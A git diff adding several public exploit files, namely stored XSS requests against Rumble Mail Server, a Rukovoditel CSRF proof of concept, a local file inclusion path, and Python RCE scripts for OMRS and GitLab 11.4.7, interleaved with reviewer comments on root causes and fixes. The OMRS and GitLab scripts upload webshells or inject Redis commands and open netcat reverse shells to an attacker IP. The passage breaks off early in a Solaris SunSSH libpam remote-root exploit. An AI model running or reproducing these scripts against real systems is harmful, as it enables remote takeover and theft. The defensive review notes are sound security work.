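Review bot: The payload in the request body and the one listed at the end disagree: the body decodes to `"><sCrIpT>alert(1)</sCrIpT>`, while the `payload:` line shows `alert(document.cookie)`. One of the two should be changed so the sample is self-consistent, and the write-up should say on which page the stored `checkuser` value is rendered, since that determines who is exposed. The `User-Agent` header is also wrapped onto a second line (`Gecko/20100101 Firefox/83.0`), which is not a valid header continuation; it should be rejoined to one line as in 49249.txt.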
diff --git a/exploits/multiple/webapps/49252.txt b/exploits/multiple/webapps/49252.txt
new file mode 100644
index 000000000..2bdfffc61
--- /dev/null
+++ b/exploits/multiple/webapps/49252.txt
@@ -0,0 +1,36 @@
+# Exploit Title: WordPress Plugin Total Upkeep 1.14.9 - Database and Files Backup Download
+# Google Dork: intitle:("Index of" AND "wp-content/plugins/boldgrid-backup/=")
+# Date: 2020-12-12
+# Exploit Author: Wadeek
+# Vendor Homepage: https://www.boldgrid.com/
+# Software Link: https://downloads.wordpress.org/plugin/boldgrid-backup.1.14.9.zip
+# Version: 1.14.9
+# Tested on: BackBox Linux
+
+1) 'readme.txt' file reveal the plugin version :
+-> GET /wp-content/plugins/boldgrid-backup/readme.txt
+Stable tag: 1.14.9
+
+2) 'env-info.php' file reveals the following informations without authentication :
+-> GET /wp-content/plugins/boldgrid-backup/cli/env-info.php
+{
+    [...],
+    "php_uname":"Linux wordpress-server X.X.X-XX-generic #XX-Ubuntu [...] x=
+86_64",
+    "php_version":"7.X.X",
+    "server_addr":"127.0.0.1",
+    "server_name":"www.example.com",
+    "server_protocol":"HTTP/1.1",
+    "server_software":"Apache/2.X.XX (Ubuntu)",
+    "uid":XX,
+    "username":"www-data"
+}
+
+3) 'restore-info.json' file reveals the name and location of the archive containing the backups without authentication :
+-> GET /wp-content/plugins/boldgrid-backup/cron/restore-info.json
+{
+    [...]
+    "filepath":"/wp-content/boldgrid_backup_[RANDOM]/boldgrid-backup-www.example.com_wordpress-[RANDOM]-[DATE]-XXXXXX.zip"
+    [...]
+}
+--trekuen-71b82944-04b2-40f7-b2e2-d8de1b7f2bb8--
\ No newline at end of file
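Review bot: The file ends with a MIME boundary line (`--trekuen-71b82944-04b2-40f7-b2e2-d8de1b7f2bb8--`) and the `php_uname` value is split by a soft line break (`x=` / `86_64`); both are mail-encoding residue and should be removed so the JSON samples read correctly. The Google Dork line shows the same artifact (`boldgrid-backup/=`). The advisory also gives no fixed version or mitigation; a closing line naming the first patched release (placeholder: `<FIXED_VERSION>`), or stating that none was known at publication, would help defenders scope exposure.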
diff --git a/exploits/multiple/webapps/49253.txt b/exploits/multiple/webapps/49253.txt
new file mode 100644
index 000000000..a2bbed8f8
--- /dev/null
+++ b/exploits/multiple/webapps/49253.txt
@@ -0,0 +1,75 @@
+# Exploit Title: Rumble Mail Server 0.51.3135 - 'servername' Stored XSS
+# Date: 2020-9-3
+# Exploit Author: Mohammed Alshehri
+# Vendor Homepage: http://rumble.sf.net/
+# Software Link:  https://sourceforge.net/projects/rumble/files/Windows%20binaries/rumble_0.51.3135-setup.exe
+# Version: Version 0.51.3135
+# Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763
+
+# Exploit:
+POST /settings:save HTTP/1.1
+Host: 127.0.0.1:2580
+Connection: keep-alive
+Content-Length: 343
+Cache-Control: max-age=0
+Authorization: Basic YWRtaW46YWRtaW4=
+Upgrade-Insecure-Requests: 1
+Origin: http://127.0.0.1:2580
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.57
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Referer: http://127.0.0.1:2580/settings
+Accept-Encoding: gzip, deflate, br
+Accept-Language: en-US,en;q=0.9
+
+save=true&runas=root&servername=%3Cscript%3Ealert%28%22xss.com%22%29%3C%2Fscript%3E&forceipv4=1&bindtoaddress=0.0.0.0&messagesizelimit=104857600&mailpath=C%3A%2FProgram+Files%2FRumble%2Fstorage&dbpath=db&radio=sqlite3&smtp=1&smtpport=25&pop3=1&pop3port=110&imap4=1&imap4port=143&deliveryattempts=5&retryinterval=360&Save+settings=Save+settings
+HTTP/1.1 302 Moved
+Location: /settings:save
+
+HTTP/1.1 200 OK
+Connection: close
+Content-Type: text/html
+
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
+<html xmlns="http://www.w3.org/1999/xhtml">
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
+<link rel="shortcut icon" href="/favicon.ico " />
+<title>RumbleLua</title>
+<link href="rumblelua2.css" rel="stylesheet" type="text/css" />
+</head>
+<body>
+<div class="header_top">
+  <div class="header_stuff">
+    RumbleLua on <script>alert(xss.com)</script><br />
+    <span class="fineprint">Rumble Mail Server v/0.51.3135 <br />
+    </span>
+
+<a href="/"><img src="/icons/computer.png" align="absmiddle" /> Server status</a>
+<a href="/domains"><img src="/icons/house.png" align="absmiddle" /> Domains & accounts</a>
+
+<a href="/users"><img src="/icons/group.png" align="absmiddle" /> RumbleLua users</a>
+<a href="/settings"><img src="/icons/report_edit.png" align="absmiddle" /> Server settings</a>
+<a href="/modules"><img src="/icons/plugin_edit.png" align="absmiddle" /> Set up modules</a>
+<a href="/systeminfo"><img src="/icons/page_white_find.png" align="absmiddle" /> System logs</a>
+<a href="/queue"><img src="/icons/clock.png" align="absmiddle" /> Mail queue</a>
+
+</div>
+</div>
+<div id="contents">
+  <h1>Server settings</h1>
+
+Saving config/rumble.conf
+</div>
+<br />
+<p align="center">
+Powered by Rumble Mail Server - [<a href="https://sourceforge.net/p/rumble/wiki/Home/">wiki</a>] [<a href="https://sourceforge.net/projects/rumble/">project home</a>]
+</p>
+</body>
+
+
+</html>
\ No newline at end of file
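Review bot: The captured response does not match the request: the body sends `servername=<script>alert("xss.com")</script>` (URL-encoded), but the echoed markup shows `alert(xss.com)` without quotes, so either the transcript was edited or the server strips the quotes, and the write-up should say which. The request carries an `Authorization: Basic` header and changes a server-wide setting, so the precondition (an authenticated RumbleLua administrator) should be stated in the header. The request body and the `HTTP/1.1 302 Moved` response run together with no separator; a blank line or a `# Response:` label would make the transcript readable.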
diff --git a/exploits/multiple/webapps/49254.txt b/exploits/multiple/webapps/49254.txt
new file mode 100644
index 000000000..c94a10cea
--- /dev/null
+++ b/exploits/multiple/webapps/49254.txt
@@ -0,0 +1,105 @@
+# Exploit Title: Rumble Mail Server 0.51.3135 - 'domain and path' Stored XSS
+# Date: 2020-9-3
+# Exploit Author: Mohammed Alshehri
+# Vendor Homepage: http://rumble.sf.net/
+# Software Link:  https://sourceforge.net/projects/rumble/files/Windows%20binaries/rumble_0.51.3135-setup.exe
+# Version: Version 0.51.3135
+# Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763
+
+# Info
+The parameters `domain` and `path` are vulnerable to stored XSS.
+
+# Exploit:
+POST /domains HTTP/1.1
+Host: 127.0.0.1:2580
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 119
+Origin: http://127.0.0.1:2580
+Authorization: Basic YWRtaW46YWRtaW4=
+Connection: keep-alive
+Referer: http://127.0.0.1:2580/domains?domain=%3Cscript%3Ealert(
+Upgrade-Insecure-Requests: 1
+
+domain=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&path=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&create=true
+HTTP/1.1 200 OK
+Connection: close
+Content-Type: text/html
+
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
+<html xmlns="http://www.w3.org/1999/xhtml">
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
+<link rel="shortcut icon" href="/favicon.ico " />
+<title>RumbleLua</title>
+<link href="rumblelua2.css" rel="stylesheet" type="text/css" />
+</head>
+<body>
+<div class="header_top">
+  <div class="header_stuff">
+    RumbleLua on a<br />
+    <span class="fineprint">Rumble Mail Server v/0.51.3135 <br />
+    </span>
+
+<a href="/"><img src="/icons/computer.png" align="absmiddle" /> Server status</a>
+<a href="/domains"><img src="/icons/house.png" align="absmiddle" /> Domains & accounts</a>
+
+<a href="/users"><img src="/icons/group.png" align="absmiddle" /> RumbleLua users</a>
+<a href="/settings"><img src="/icons/report_edit.png" align="absmiddle" /> Server settings</a>
+<a href="/modules"><img src="/icons/plugin_edit.png" align="absmiddle" /> Set up modules</a>
+<a href="/systeminfo"><img src="/icons/page_white_find.png" align="absmiddle" /> System logs</a>
+<a href="/queue"><img src="/icons/clock.png" align="absmiddle" /> Mail queue</a>
+
+</div>
+</div>
+<div id="contents">
+  <h2>Domains</h2>
+<p>
+  <table class="elements" border='0' cellpadding='5' cellspacing='1'><tr><th>Create a new domain</th></tr><tr><td><b><font color='darkgreen'>Domain <script>alert("XSS")</script> has been created.</font></b></td></tr><tr><td>			<form action="/domains" method="post" id='create'>
+			<div>
+			<div >
+				<div class='form_key'>
+					Domain name:
+				</div>
+				<div class='form_value'>
+					<input type="text" name="domain"/>
+				</div>
+			</div>
+
+			<div>
+				<div class='form_key'>
+					Optional alt. storage path:
+				</div>
+				<div class='form_value'>
+					<input type="text" name="path"/>
+				</div>
+			</div>
+
+
+			<div class='form_el' id='domainsave' >
+				<div class='form_key'>
+						<input type="hidden" name="create" value="true"/>
+					<input class="button" type="submit" value="Save domain"/>
+					<input class="button"  type="reset" value="Reset"/>
+				</div>
+			</div>
+			<br/><br/><br/><br/><br />
+			</div>
+			</form>
+			</td></tr></table></p>
+<p>&nbsp;</p>
+<table class="elements" border='0' cellpadding='5' cellspacing='1'>
+  <tr><th>Domain</th><th>Actions</th></tr>
+<tr><td><img src='/icons/house.png' align='absmiddle'/>&nbsp;<a href='/accounts:<script>alert("XSS")</script>'><strong><script>alert("XSS")</script></strong></a></td><td><a href="/domains:<script>alert("XSS")</script>"><img title='Edit domain' src='/icons/report_edit.png' align='absmiddle'/></a>  <a href="/domains?domain=<script>alert("XSS")</script>&delete=true"><img title='Delete domain' src='/icons/delete.png' align='absmiddle'/></a></td></tr></table>
+</div>
+<br />
+<p align="center">
+Powered by Rumble Mail Server - [<a href="https://sourceforge.net/p/rumble/wiki/Home/">wiki</a>] [<a href="https://sourceforge.net/projects/rumble/">project home</a>]
+</p>
+</body>
+
+
+</html>
\ No newline at end of file
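Review bot: Neither this advisory nor 49255.txt (`username`) states the root cause or a remediation, and the captured response here only demonstrates `domain`: the `path` value named in the title does not appear in the returned HTML. The response shows the stored value written unencoded into element text and into `href` attributes (`/accounts:…`, `/domains?domain=…`), so the fix needs context-aware output encoding at render time (HTML-entity encoding for text, attribute and URL encoding for links), not input filtering alone. Both requests carry an `Authorization: Basic` header, so storing the value requires an authenticated admin-panel request; stating that precondition would help readers rate the issue. The `Referer` value in the request is also truncated at `alert(`.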
diff --git a/exploits/multiple/webapps/49255.txt b/exploits/multiple/webapps/49255.txt
new file mode 100644
index 000000000..50b5847d1
--- /dev/null
+++ b/exploits/multiple/webapps/49255.txt
@@ -0,0 +1,146 @@
+# Exploit Title: Rumble Mail Server 0.51.3135 - 'username' Stored XSS
+# Date: 2020-9-3
+# Exploit Author: Mohammed Alshehri
+# Vendor Homepage: http://rumble.sf.net/
+# Software Link:  https://sourceforge.net/projects/rumble/files/Windows%20binaries/rumble_0.51.3135-setup.exe
+# Version: Version 0.51.3135
+# Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763
+
+# Exploit:
+POST /users HTTP/1.1
+Host: 127.0.0.1:2580
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 96
+Origin: http://127.0.0.1:2580
+Authorization: Basic YWRtaW46YWRtaW4=
+Connection: keep-alive
+Referer: http://127.0.0.1:2580/users
+Upgrade-Insecure-Requests: 1
+
+username=%3Cscript%3Ealert%28%22M507%22%29%3C%2Fscript%3E&password=admin&rights=*&submit=Submit
+HTTP/1.1 200 OK
+Connection: close
+Content-Type: text/html
+
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
+<html xmlns="http://www.w3.org/1999/xhtml">
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
+<link rel="shortcut icon" href="/favicon.ico " />
+<title>RumbleLua</title>
+<link href="rumblelua2.css" rel="stylesheet" type="text/css" />
+</head>
+<body>
+<div class="header_top">
+  <div class="header_stuff">
+    RumbleLua on a.com<br />
+    <span class="fineprint">Rumble Mail Server v/0.51.3135 <br />
+    </span>
+
+<a href="/"><img src="/icons/computer.png" align="absmiddle" /> Server status</a>
+<a href="/domains"><img src="/icons/house.png" align="absmiddle" /> Domains & accounts</a>
+
+<a href="/users"><img src="/icons/group.png" align="absmiddle" /> RumbleLua users</a>
+<a href="/settings"><img src="/icons/report_edit.png" align="absmiddle" /> Server settings</a>
+<a href="/modules"><img src="/icons/plugin_edit.png" align="absmiddle" /> Set up modules</a>
+<a href="/systeminfo"><img src="/icons/page_white_find.png" align="absmiddle" /> System logs</a>
+<a href="/queue"><img src="/icons/clock.png" align="absmiddle" /> Mail queue</a>
+
+</div>
+</div>
+<div id="contents">
+
+
+<h1>RumbleLua users </h1>
+<p>This page allows you to create, modify or delete accounts on the RumbleLua system.<br />
+Users with <img src="../icons/action_lock.png" alt="lock" width="24" height="24" align="absmiddle" /><span style="color:#C33; font-weight:bold;"> Full control</span> can add, edit and delete domains as well as change server settings, <br />
+while regular users can only
+see and edit the domains they have access to.
+</p>
+<table class="elements">
+  <tr>
+    <th>Create a new user:</th>
+  </tr>
+<tr>
+<td>
+<form action="/users" method="post" name="makeuser">
+
+  <div style="width: 300px; text-align:right; float: left;">
+    <label for="username"><strong>Username:</strong></label>
+    <input name="username" autocomplete="off" type="text" id="username" >
+    <br>
+    <label for="password"><strong>Password:</strong></label>
+    <input type="password" autocomplete="off" name="password" id="password">
+    <br />
+    <label for="password"><strong>Access rights:</strong></label>
+    <select name="rights" size="4" style="width: 150px;" multiple="multiple">
+    <option value="*" style="color:#C33; font-weight:bold;">Full control</option>
+    <optgroup label="Domains:">
+        </optgroup>
+    </select>
+      </div>
+    <p><br /><br />
+<br />
+<br />
+<br />
+<br />
+<br />
+<br />
+<br />
+<br />
+
+      &nbsp;&nbsp;
+      <input type="submit" name="submit" id="submit" value="Submit" />
+    </p>
+
+</form>
+</td>
+</tr>
+</table>
+<table width="200" class="elements">
+  <tr>
+    <th>Username</th>
+    <th>Rights</th>
+    <th>Actions</th>
+  </tr>
+  <tr>
+    <td><img src="/icons/action_lock.png" align="absmiddle"/>&nbsp;<strong><font color='#006600'><script>alert("M507")</script></font></strong></td>
+    <td>Full control</td>
+    <td>
+	<a href="/users?user=<script>alert("M507")</script>&edit=true"><img src="/icons/action_edit.png" title="Edit" align="absmiddle"/></a>&nbsp;
+	<a href="/users?user=<script>alert("M507")</script>&delete=true"><img src="/icons/action_delete.png" title="Delete" align="absmiddle"/></a>
+	</td>
+  </tr>
+    <tr>
+    <td><img src="/icons/action_lock.png" align="absmiddle"/>&nbsp;<strong><font color='#006600'>admin</font></strong></td>
+    <td>Full control</td>
+    <td>
+	<a href="/users?user=admin&edit=true"><img src="/icons/action_edit.png" title="Edit" align="absmiddle"/></a>&nbsp;
+	<a href="/users?user=admin&delete=true"><img src="/icons/action_delete.png" title="Delete" align="absmiddle"/></a>
+	</td>
+  </tr>
+    <tr>
+    <td><img src="/icons/action_lock.png" align="absmiddle"/>&nbsp;<strong><font color='#006600'><script>alert("M5072")</script></font></strong></td>
+    <td>Full control</td>
+    <td>
+	<a href="/users?user=<script>alert("XSS")</script>&edit=true"><img src="/icons/action_edit.png" title="Edit" align="absmiddle"/></a>&nbsp;
+	<a href="/users?user=<script>alert("XSS")</script>&delete=true"><img src="/icons/action_delete.png" title="Delete" align="absmiddle"/></a>
+	</td>
+  </tr>
+  </table>
+<p>&nbsp;</p>
+
+
+</div>
+<br />
+<p align="center">
+Powered by Rumble Mail Server - [<a href="https://sourceforge.net/p/rumble/wiki/Home/">wiki</a>] [<a href="https://sourceforge.net/projects/rumble/">project home</a>]
+</p>
+</body>
+
+
+</html>
\ No newline at end of file
diff --git a/exploits/php/webapps/49245.txt b/exploits/php/webapps/49245.txt
new file mode 100644
index 000000000..b67419f9e
--- /dev/null
+++ b/exploits/php/webapps/49245.txt
@@ -0,0 +1,30 @@
+# Exploit Title: Rukovoditel 2.6.1 - Cross-Site Request Forgery (Change 
+password)
+# Date: 2020-12-14
+# Exploit Author: KeopssGroup0day,Inc
+# Vendor Homepage: https://www.rukovoditel.net/
+# Software Link: https://www.rukovoditel.net/download.php
+# Version: v2.6.1
+# Tested on: Kali Linux
+
+POC(localhost/index.php?module=users/change_password):
+
+<html>
+   <!-- CSRF PoC  -->
+   <body>
+   <script>history.pushState('', '', '/')</script>
+     <form 
+action="https://localhost/index.php?module=users/change_password&action=change" 
+method="POST">
+       <input type="hidden" name="form&#95;session&#95;token" 
+value="D&#94;HUyTDh0X" />
+       <input type="hidden" name="password&#95;new" value="123456789" />
+       <input type="hidden" name="password&#95;confirmation" 
+value="123456789" />
+       <input type="submit" value="Submit request" />
+     </form>
+   </body>
+</html>
+
+
+--
\ No newline at end of file
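Review bot: The PoC posts a fixed `form_session_token` value, but the advisory never says why that token fails to stop the request (not validated server-side, or not bound to the session), which is the detail a maintainer needs in order to fix it. The form carries only `password_new` and `password_confirmation`, so the change-password action apparently does not ask for the current password. I would add a short description and remediation section: validate a per-session token on `action=change`, require the current password, and set `SameSite` on the session cookie. The title in the header is also broken across two lines (`Change` / `password)`).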
diff --git a/exploits/php/webapps/49258.txt b/exploits/php/webapps/49258.txt
new file mode 100644
index 000000000..e61a6f1c1
--- /dev/null
+++ b/exploits/php/webapps/49258.txt
@@ -0,0 +1,26 @@
+# Exploit Title: Task Management System 1.0 - 'page' Local File Inclusion
+# Exploit Author: İsmail BOZKURT
+# Date: 2020-12-15
+# Vendor Homepage: https://www.sourcecodester.com/php/14615/task-management-system-using-phpmysqli-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14615&title=Task+Management+System+using+PHP%2FMySQLi+with+Source+Code
+# Affected Version: Version 1
+# Category: Web Application
+# Tested on: Windows 10 x86_64
+
+Step 1. Log into application with credentials
+Step 2. Click on Branch
+Step 3. Select New Branch http://127.0.0.1/index.php?page=index
+Step 4. change index to ../../../c:/xampp/apache/bin/php.ini%00
+
+Note: php version < 5.3.3
+
+section class="content">
+    <div class="container-fluid">
+    <?php 
+    	$page = isset($_GET['page']) ? $_GET['page'] : 'home';
+	    if(!file_exists($page.".php")){
+	    include '404.html';
+	    }else{
+	    include $page.'.php';
+    }
+    ?>
\ No newline at end of file
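Review bot: The `Note: php version < 5.3.3` line covers only the `%00` truncation in step 4; the quoted code still passes `$_GET['page']` straight into `include $page.'.php'`, so inclusion of other `.php` files through path traversal does not depend on the PHP version, and the advisory should say so. It also gives no remediation; the usual fix is an allow-list of page names, e.g. `$allowed = ['home', 'index']; if (!in_array($page, $allowed, true)) { $page = 'home'; }` (page names constructed for illustration), rather than stripping `../`. The quoted snippet opens with `section class="content">`, missing its leading `<`.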
diff --git a/exploits/php/webapps/49260.py b/exploits/php/webapps/49260.py
new file mode 100755
index 000000000..1d2d8b55c
--- /dev/null
+++ b/exploits/php/webapps/49260.py
@@ -0,0 +1,128 @@
+# Exploit Title: Online Marriage Registration System (OMRS) 1.0 - Remote Code Execution (Authenticated)
+# Google Dork: N/A
+# Date: 2020-14-12
+# Exploit Author: Andrea Bruschi - www.andreabruschi.net
+# Vendor Homepage: https://phpgurukul.com/
+# Software Link: https://phpgurukul.com/online-marriage-registration-system-using-php-and-mysql/
+# Version: 1.0
+# Tested on: Windows 10 / Xampp Server and Wamp Server
+
+#!/usr/bin/python3
+
+import requests
+import sys
+import os
+import iterm2
+import AppKit
+
+url = sys.argv[1]
+mobile = sys.argv[2]
+password = sys.argv[3] 
+
+# CONFIGURE HERE
+reverse_ip = '192.168.xx.xx'
+reverse_port = 4444
+
+# CONFIGURE HERE
+# SCRIPT WILL DOWNLOAD NETCAT AND A WEBSHELL
+netcat_path = '/local/path/to/nc.exe'
+shell_path = '/local/path/to/shell.php'
+
+
+def login(url, mobile, password):
+
+    url = "{}/user/login.php".format(url)
+    payload = {'mobno':mobile, 'password':password, 'login':''}
+    req = requests.post(url, data=payload)
+    cookie = req.cookies['PHPSESSID']
+    
+    return cookie
+
+
+def upload(url, cookie, file=None):
+
+    f = open(file, 'rb')
+    filename, ext = os.path.splitext(file)
+
+    if "exe" in ext:
+        content_type = 'application/octet-stream'
+    else:
+        content_type = 'application/x-php'
+
+    cookie = {'PHPSESSID':cookie}
+    url = "{}/user/marriage-reg-form.php".format(url)
+
+    files = {'husimage': (filename + ext, f, content_type, {'Expires': '0'}), 'wifeimage':('test.jpg','','image/jpeg')}
+    payload = {'dom':'05/01/2020','nofhusband':'test', 'hreligion':'test', 'hdob':'05/01/2020','hsbmarriage':'Bachelor','haddress':'test','hzipcode':'test','hstate':'test','hadharno':'test','nofwife':'test','wreligion':'test','wsbmarriage':'Bachelor','waddress':'test','wzipcode':'test','wstate':'test','wadharno':'test','witnessnamef':'test','waddressfirst':'test','witnessnames':'test','waddresssec':'test','witnessnamet':'test','waddressthird':'test','submit':''}
+    req = requests.post(url, data=payload, cookies=cookie, files=files)
+    print(f'[+] File {ext} uploaded')
+
+
+def get_remote_file(url, ext):
+
+    url = "{}/user/images".format(url)
+    req = requests.get(url)
+    junk = req.text.split(ext)[0]
+    f = junk[-42:] + ext
+    
+    return f
+
+
+def persistence(url, webshell, netcat):
+
+    # webshell
+    payload_w = "copy /y {} shell.php".format(webshell)
+    url_w = "{}/user/images/{}?cmd={}".format(url, webshell, payload_w)
+    req_w = requests.get(url_w)
+    
+    # netcat
+    payload_n = "copy /y {} nc.exe".format(netcat)
+    url_n = "{}/user/images/{}?cmd={}".format(url, webshell, payload_n)
+    req_n= requests.get(url_n)
+
+    print('[+] Persistence enabled')
+
+
+def get_reverse(url, ip, port):
+
+    payload = "nc.exe -nv {} {} -e cmd.exe".format(ip, port)
+    url_r = "{}/user/images/shell.php?cmd={}".format(url, payload)
+    print('[+] Reverse shell incoming!')
+    req = requests.get(url_r)
+
+
+# CONFIGURE HERE
+# THE SCRIPT WILL LAUNCH iTerm2 WINDOW RUNNING NC LISTENER
+# YOU CAN ALSO COMMENT THE CALL TO THIS FUNCTION BELOW AND START NC MANUALLY
+def start_listener(port):
+    
+    # Launch the app
+    AppKit.NSWorkspace.sharedWorkspace().launchApplication_("iTerm2")
+
+    async def main(connection):
+        app = await iterm2.async_get_app(connection)
+        window = app.current_window
+        if window is not None:
+            cmd = "nc -lnv {}".format(port)
+            await window.async_create_tab(command=cmd)
+        else:
+            print("No current window")
+
+    iterm2.run_until_complete(main)
+
+
+
+if __name__ == "__main__":
+
+    if len(sys.argv < 3): 
+        print("Usage: exploit.py <URI> <MOBILE> <PASSWORD>")
+    else:
+        cookie = login(url, mobile, password)
+        upload(url, cookie, netcat_path)
+        upload(url, cookie, shell_path)
+        webshell = get_remote_file(url, '.php')
+        netcat = get_remote_file(url, '.exe')
+        persistence(url, webshell, netcat)
+        
+        start_listener(reverse_port)
+        get_reverse(url, reverse_ip, reverse_port)
\ No newline at end of file
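Review bot: The header comment names the impact but not the root cause, which is what a defender needs from this file. As `upload()` shows, the `husimage` field of `/user/marriage-reg-form.php` is posted with `.php` and `.exe` content, and `persistence()` then requests the stored file under `/user/images/` with a `cmd` parameter, so the application apparently neither restricts upload types nor prevents script execution in the upload directory. I would add a comment such as `# Root cause: unrestricted upload via 'husimage'; files land in web-served /user/images/ and run as PHP` plus `# Mitigation: allow-list image types, store uploads outside the webroot, disable PHP execution in the upload directory`. Requests to `/user/images/*.php` carrying a `cmd=` query string are a usable detection signal in web server logs.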
diff --git a/exploits/ruby/webapps/49257.py b/exploits/ruby/webapps/49257.py
new file mode 100755
index 000000000..e44dae0c7
--- /dev/null
+++ b/exploits/ruby/webapps/49257.py
@@ -0,0 +1,64 @@
+# Exploit Title: Gitlab 11.4.7 - Remote Code Execution
+# Date: 14-12-2020
+# Exploit Author: Fortunato Lodari fox [at] thebrain [dot] net, foxlox
+# Vendor Homepage: https://about.gitlab.com/
+# POC: https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/
+# Tested On: Debian 10 + Apache/2.4.46 (Debian)
+# Version: 11.4.7 community
+
+import sys
+import requests
+import time
+import random
+import http.cookiejar
+import os.path
+from os import path
+
+# Sign in GitLab 11.4.7  portal and get (using Burp or something other):
+# authenticity_token
+# authenticated cookies
+# username
+# specify localport and localip for reverse shell
+
+username='aaaaaaaaaaaa'
+authenticity_token='jpT/n1EoPwwWtiGu/+QKVQomofMNyqAQXY+iD2kVoRQoiQNzcFHPAj2+M4pyblKo/7UkClKW8jvp51Aw2qzs7g=='
+cookie = '_gitlab_session=c942527505cc0580c026610a1799b811; sidebar_collapsed=false'
+localport='1234'
+localip='192.168.0.114'
+
+
+url = "http://192.168.0.130:5080"
+proxies = { "http": "http://localhost:8080" }
+
+
+def deb(str):
+    print("Debug => "+str)
+
+def create_payload(authenticity_token,prgname,namespace_id,localip,localport,username):
+    return {'utf8':'✓','authenticity_token':authenticity_token,'project[ci_cd_only]':'false','project[name]':prgname,'project[namespace_id]':namespace_id,'project[path]':prgname,'project[description]':prgname,'project[visibility_level]':'20','':'project[initialize_with_readme]','project[import_url]':'git://[0:0:0:0:0:ffff:127.0.0.1]:6379/\n multi\n sadd resque:gitlab:queues system_hook_push\n lpush resque:gitlab:queue:system_hook_push "{\\"class\\":\\"GitlabShellWorker\\",\\"args\\":[\\"class_eval\\",\\"open(\'|nc '+localip+' '+localport+' -e /bin/sh\').read\\"],\\"retry\\":3,\\"queue\\":\\"system_hook_push\\",\\"jid\\":\\"ad52abc5641173e217eb2e52\\",\\"created_at\\":1513714403.8122594,\\"enqueued_at\\":1513714403.8129568}"\n exec\n exec\n exec\n/'+username+'/'+prgname+'.git'}
+
+import string
+def random_string(length):
+    return ''.join(random.choice(string.ascii_letters) for m in range(length))
+
+def init(username,cookie,authenticity_token,localport,localip):
+    from bs4 import BeautifulSoup
+    import re
+    import urllib.parse
+    deb("Token: "+authenticity_token)
+    deb("Cookie: "+cookie)
+    session=requests.Session()
+    headers = {'user-agent':'Moana Browser 1.0','Cookie':cookie,'Content-Type':'application/x-www-form-urlencoded','DNT':'1','Upgrade-Insecure-Requests':'1'}
+    r=session.get(url+'/projects/new',headers=headers,allow_redirects=True)
+    soup = BeautifulSoup(r.content,"lxml")
+    nsid = soup.findAll('input', {"id": "project_namespace_id"})
+    namespace_id=nsid[0]['value'];
+    deb("Namespace ID: "+namespace_id)
+    prgname=random_string(8)
+    newpayload=create_payload(authenticity_token,prgname,namespace_id,localip,localport,username)
+    newpayload=urllib.parse.urlencode(newpayload)
+    deb("Payload encoded: "+newpayload)
+    r=session.post(url+'/projects',newpayload,headers=headers,allow_redirects=False)
+    os.system("nc -nvlp "+localport)
+
+init(username,cookie,authenticity_token,localport,localip)
\ No newline at end of file
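Review bot: The header gives no CVE identifier, fixed version or description of the flaw, so a reader cannot tell which GitLab releases need patching; only the linked write-up explains it. From `create_payload()`, the request depends on `project[import_url]` accepting a `git://` URL whose host is the IPv4-mapped IPv6 loopback `[0:0:0:0:0:ffff:127.0.0.1]` on port 6379 and whose path contains raw newlines, i.e. a server-side request to local Redis with injected lines. I would add a header comment saying so (`# Root cause: import_url loopback filter bypass plus newline injection reaching local Redis`) together with the defensive checks: reject import URLs that resolve to loopback or private ranges including mapped IPv6 forms, reject control characters in URLs, and require authentication on Redis. Separately, `deb(str)` shadows the builtin `str`, and `time`, `http.cookiejar`, `path` and `re` are imported but unused.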
diff --git a/exploits/solaris/remote/49261.c b/exploits/solaris/remote/49261.c
new file mode 100644
index 000000000..404c67bbe
--- /dev/null
+++ b/exploits/solaris/remote/49261.c
@@ -0,0 +1,592 @@
+# Exploit Title: Solaris SunSSH 11.0 x86 - libpam Remote Root 
+# Exploit Author: Hacker Fantastic
+# Vendor Homepage: https://www.oracle.com/solaris/technologies/solaris11-overview.html
+# Version: 11
+# Tested on: SunOS solaris 5.11 11.0
+
+/* SunSSH Solaris 10-11.0 x86 libpam remote root exploit CVE-2020-14871
+ * ====================================================================
+ * Makefile
+ * all: hfsunsshdx
+ *
+ *	hfsunsshdx: main.c
+ *	gcc main.c -o hfsunsshdx -lssh2 
+ *
+ *	clean:
+ *	rm -rf hfsunsshdx
+ *	rm -rf core.*
+ *
+ * A trivial to reach stack-based buffer overflow is present in libpam on
+ * Solaris. The vulnerable code exists in pam_framework.c parse_user_name()
+ * which allocates a fixed size buffer of 512 bytes on the stack and parses
